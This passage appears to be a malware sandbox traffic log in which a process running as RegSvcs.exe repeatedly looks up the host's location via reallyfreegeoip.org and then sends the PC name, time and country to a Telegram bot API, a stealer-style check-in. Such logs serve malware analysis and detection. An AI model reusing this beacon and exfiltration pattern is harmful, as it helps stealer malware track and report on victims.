                                                                                                                  2025-01-11 00:27:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.549708104.21.80.14432804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:27:45 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-11 00:27:45 UTC858INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:45 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870054
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kfKm8h1tOlklZMeGeHQv%2FmCVv%2ByJw7Q6IeKkw%2FZrEbN2shn1J9KS60oq2l7ab80bIzmLbo2KrmfA30jCXJ2CkYRDXbvJNxKUDm65uWsidLhytmc6oJSYInKivYPN3CO%2FySf%2BqLHe"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c867cf6b42d2-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1594&rtt_var=797&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=389853&cwnd=229&unsent_bytes=0&cid=b90934e5e27d7e37&ts=142&x=0"
                                                                                                                  2025-01-11 00:27:45 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.549710104.21.80.14432804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:27:46 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-11 00:27:46 UTC853INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:46 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870055
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XlY0bCywZCrEOGqbOTnKrt4oiyxrX6bNxGCt1vmtRugkHHlHfE4XqSyKk2YVhG8jk5wzvqG%2B2kjJAjcBYPIEUXKWl9k3qyU5fMMit%2FsL9DMwvcuJ4Td3zBCuz1xfL4YSRgrxkvPj"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c870dde58c0f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=2014&rtt_var=764&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1423001&cwnd=223&unsent_bytes=0&cid=5560e0442982f38e&ts=159&x=0"
                                                                                                                  2025-01-11 00:27:46 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.549712104.21.80.14432804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:27:47 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-11 00:27:48 UTC859INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:47 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870057
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VEbT0c7%2FToglLINY73neD1PoQBzH2YQHOtxRR%2Flh9zp60IbshbnBivpwdMMgQno9zmW07uMvuDz8PAAw7nrKC1NVBt%2Bhvx3MW7cFv7wbyOSv9BcoOecp9%2B0N55WBOblEwDW%2BzmyA"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c878ee607d0e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1941&min_rtt=1936&rtt_var=736&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1476238&cwnd=244&unsent_bytes=0&cid=6c445f4a780736e7&ts=144&x=0"
                                                                                                                  2025-01-11 00:27:48 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.549714104.21.80.14432804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:27:49 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-11 00:27:49 UTC859INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:49 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870058
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RBa9jFFbNzdhu7HpVyzQ9rR8dMQqCHV1FjjoTkfl3dPw96eKWyKzDsX5Q1Y3wPhCuv1AWeEUr5CS5%2ByX%2FcndFctyhvoM8z30O8%2FegqPIodGROu%2Bimg0WGo3a%2F5cZlO7SRFQlcTlM"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c880fc2642d2-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1581&rtt_var=611&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1846932&cwnd=229&unsent_bytes=0&cid=82d7372aa6aae127&ts=130&x=0"
                                                                                                                  2025-01-11 00:27:49 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.549717104.21.80.14432804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:27:50 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-11 00:27:50 UTC859INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:50 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870059
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tbll4Q0QmSjbpghhGbU75v%2BGADHeXUX6ppZPrlhpNXe9%2BKK4XifgHDiEX%2Fw1nqVfSCG3q783yWcRZq4azG1Bgczle%2F1VSw8q8p5nhhjenygRyEC8gsMSgD2SqsnBJD3I1uz%2FyX5D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c889e9230f36-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1510&min_rtt=1510&rtt_var=566&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1931216&cwnd=231&unsent_bytes=0&cid=2b4be71c133194fd&ts=269&x=0"
                                                                                                                  2025-01-11 00:27:50 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.549730104.21.80.14432804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:27:51 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  2025-01-11 00:27:52 UTC859INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:52 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870061
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8G8ES1DE%2BlbX8nSk5ADfGYCMTI5yOn8R1aizXSg%2BzmtfoaOknjB8eIcC6ca1EPtGRYDWnmwKnX6nhoCr5%2BMUL2TIq%2F9Jv1FZ62WaIB2bpIjrbiZkNguTYPoX0ziToOwSHINn2KR%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c891e8b342d2-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1571&rtt_var=611&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1757977&cwnd=229&unsent_bytes=0&cid=ccb5f6c1b88d5732&ts=153&x=0"
                                                                                                                  2025-01-11 00:27:52 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.549744104.21.80.14432804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:27:53 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-11 00:27:53 UTC855INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:53 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870062
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ahvDx83ivTLrKezJ2pokMFTdYHbXNKvKmiTRACJFGcgsuSQWM85lpwqucyLGIOT%2FX0GB72BOyMOEJT7qOjgF%2FMbCOKROWfWFvRiICXTldpoMCgJUpN1hKE4YPQPv3BXFTtFe%2F4T4"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c89b6c1442d2-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1551&rtt_var=609&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1755862&cwnd=229&unsent_bytes=0&cid=e1895ebc1870994c&ts=411&x=0"
                                                                                                                  2025-01-11 00:27:53 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.549749149.154.167.2204432804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:27:54 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:32:35%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20376483%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                  Host: api.telegram.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-11 00:27:54 UTC344INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:54 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 55
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  2025-01-11 00:27:54 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.555414104.21.80.14436148C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:27:58 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-11 00:27:58 UTC857INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:58 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870067
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5D8dtSZnZNwa0UdJKasCPnekrnNozXfTxdSaa1InYF%2BuV3MMsgCpAccO1rzDuIuiUdD%2FJ66KTJV%2B1Y6cJ2VIV4LqODZyHE1Z2gcP8VLMHEB5tEa63aAWKjlpQ8KZ3JnR%2B4CZ7qEJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c8ba2f5bc443-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1615&rtt_var=628&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1712609&cwnd=244&unsent_bytes=0&cid=25eefbd9d27cbefa&ts=173&x=0"
                                                                                                                  2025-01-11 00:27:58 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
